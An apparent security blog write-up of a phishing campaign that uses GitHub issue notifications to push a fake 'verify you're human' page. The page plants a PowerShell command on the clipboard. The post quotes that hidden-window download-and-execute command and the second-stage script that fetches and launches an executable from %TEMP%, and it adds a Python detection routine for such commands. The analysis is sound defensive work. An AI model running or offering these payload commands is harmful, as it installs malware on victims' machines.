GitHub issues used to spam public repos to download a malicious file

GitHub issues are used to spam public repos

I received a legitimate-looking email from GitHub about one of my repositories having a vulnerability. It seems someone created an issue and provided a link I should follow to fix it (the issue appears to have been created and then deleted).

The email is a typical issue notification containing the creator's message:

Hey there!

We have detected a security vulnerability in your repository. Please contact us at hxxps://github-scanner.com to get more information on how to fix this issue.

Best regards,

Github Security Team

Reply to this email directly, view it on GitHub, or unsubscribe.

You are receiving this because you are subscribed to this thread.

The email headers show it is a legitimate email from GitHub. A quick Google search for the domain brings no results. A whois lookup shows the domain was registered only on 18 September.

Visiting the page shows a "verify you're a human" button. Clicking that button copies the following text to the clipboard and instructs the user to type Ctrl + R, Ctrl + V, ENTER (essentially telling the user to open the Run dialog, paste the command and execute it):

powershell.exe -w hidden -Command "iex (iwr 'hxxps://github-scanner.com[/]download.txt').Content" # "✅ I am not a robot – reCAPTCHA Verification ID: 93752"

The content of download.txt is the following:

$webClient = New-Object System.Net.WebClient
$url1 = "hxxps://github-scanner.com/l6E.exe"
$filePath1 = "$env:TEMP\SysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)      # fetch the payload into %TEMP% under a benign-looking name
Start-Process -FilePath $env:TEMP\SysSetup.exe   # and launch it

Basically, it downloads an executable, saves it in %TEMP% as SysSetup.exe and executes it. At the time of writing, the URL was not flagged as malicious by any AV engine, even though the actual sample was (at least 14 engines now flag the URL as malicious).
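The clipboard command above is the part of this chain a defender can actually see: a PowerShell launch with a hidden window, in-memory execution of remote content, and a "human verification" decoy comment on the same command line. The following Python triage function is an added example (not code from the original post) that scores constructed process-creation log lines for exactly that pattern; the log format, the parent-process field and the sample lines are assumptions for illustration.

```python
import re

# Constructed sample process-creation records (not from the original post),
# in an assumed "parent -> command line" export format.
SAMPLE_LOGS = [
    'explorer.exe -> powershell.exe -w hidden -Command "iex (iwr \'hxxps://github-scanner.com/download.txt\').Content" # "I am not a robot - reCAPTCHA Verification ID: 93752"',
    'cmd.exe -> powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
    'explorer.exe -> powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'hxxp://example.invalid/a.txt\')"',
    'svchost.exe -> powershell.exe Get-Process',
]

# Indicators taken from the command line quoted in the post.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
REMOTE_EXEC = re.compile(r"\biex\b|invoke-expression", re.I)
DOWNLOAD = re.compile(r"\biwr\b|invoke-webrequest|downloadstring|downloadfile", re.I)
DECOY = re.compile(r"not a robot|recaptcha|verification id", re.I)


def score_command(cmdline: str) -> dict:
    """Return which indicators fire on one command line plus a verdict."""
    hits = {
        "hidden_window": bool(HIDDEN_WINDOW.search(cmdline)),
        "remote_exec": bool(REMOTE_EXEC.search(cmdline)),
        "download": bool(DOWNLOAD.search(cmdline)),
        "captcha_decoy": bool(DECOY.search(cmdline)),
    }
    # Download-and-evaluate alone is worth a look; the decoy comment makes it
    # the ClickFix lure described above rather than an admin one-liner.
    if hits["remote_exec"] and hits["download"]:
        verdict = "clickfix" if hits["captcha_decoy"] else "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, **hits}


def parse_record(line: str) -> tuple:
    """Split an assumed 'parent -> command line' record into its two fields."""
    parent, _, cmd = line.partition(" -> ")
    return parent.strip(), cmd.strip()


def triage(lines) -> list:
    """Return (parent, score) for every PowerShell launch in the records.

    A parent of explorer.exe is consistent with a command typed into the Run
    dialog, which is what the lure instructs the victim to do.
    """
    results = []
    for line in lines:
        parent, cmd = parse_record(line)
        if "powershell" not in cmd.lower():
            continue
        results.append((parent, score_command(cmd)))
    return results
```

The regexes are deliberately loose; in a real pipeline you would pair them with an allow-list of known administrative scripts rather than rely on the decoy string alone.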

VirusTotal report for the sample:

https://www.virustotal.com/gui/file/d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207/details
